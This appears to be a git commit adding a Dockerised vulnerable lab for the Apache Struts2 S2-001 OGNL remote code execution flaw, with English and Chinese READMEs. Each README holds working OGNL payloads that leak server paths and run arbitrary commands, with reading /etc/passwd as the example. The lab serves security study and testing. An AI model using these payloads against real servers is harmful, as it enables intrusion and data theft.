first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/struts2/s2-001/1.jpeg
+++ b/struts2/s2-001/1.jpeg
--- a/struts2/s2-001/Dockerfile
+++ b/struts2/s2-001/Dockerfile
@@ -0,0 +1,10 @@
+FROM vulhub/tomcat:8.5
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && rm -rf /usr/local/tomcat/webapps/* \
+    && chmod a+x /usr/local/tomcat/bin/*.sh
+
+COPY S2-001.war /usr/local/tomcat/webapps/ROOT.war
+EXPOSE 8080
--- a/struts2/s2-001/README.md
+++ b/struts2/s2-001/README.md
@@ -0,0 +1,40 @@
+# S2-001 Remote Code Execution Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Reference link
+
+[http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html](http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html)
+
+> The vulnerability is that when the user submits the form data and the validation fails, the server parses the parameter values previously submitted by the user with the OGNL expression `%{value}` and repopulates the corresponding form data.For example, in the registration or login page. When submit fail, server will generally return the previously submitted data by default. Since the server uses `%{value}` to execute an OGNL expression parsing on the submitted data, it can send payload directly to execute command.
+
+## Environment setup
+
+Run the following commands to setup
+
+```
+docker compose build
+docker compose up -d
+```
+
+## POC && EXP
+
+Get the tomcat path:
+
+```
+%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
+```
+
+Get the web site real path:
+
+```
+%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
+```
+
+Execute command (command with parameter:`new java.lang.String[]{"cat","/etc/passwd"}`):
+
+```
+%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
+```
+
+![](1.jpeg)
--- a/struts2/s2-001/README.zh-cn.md
+++ b/struts2/s2-001/README.zh-cn.md
@@ -0,0 +1,38 @@
+# S2-001 远程代码执行漏洞
+
+## 原理
+
+参考 [http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html](http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html)
+
+> 该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行
+
+## 环境
+
+执行以下命令启动s2-001测试环境
+
+```
+docker compose build
+docker compose up -d
+```
+
+## POC && EXP
+
+获取tomcat执行路径：
+
+```
+%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
+```
+
+获取Web路径：
+
+```
+%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
+```
+
+执行任意命令（命令加参数：`new java.lang.String[]{"cat","/etc/passwd"}`）：
+
+```
+%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
+```
+
+![](1.jpeg)
--- a/struts2/s2-001/S2-001.war
+++ b/struts2/s2-001/S2-001.war
--- a/struts2/s2-001/docker-compose.yml
+++ b/struts2/s2-001/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ struts2:
+   build: .
+   ports:
+    - "8080:8080"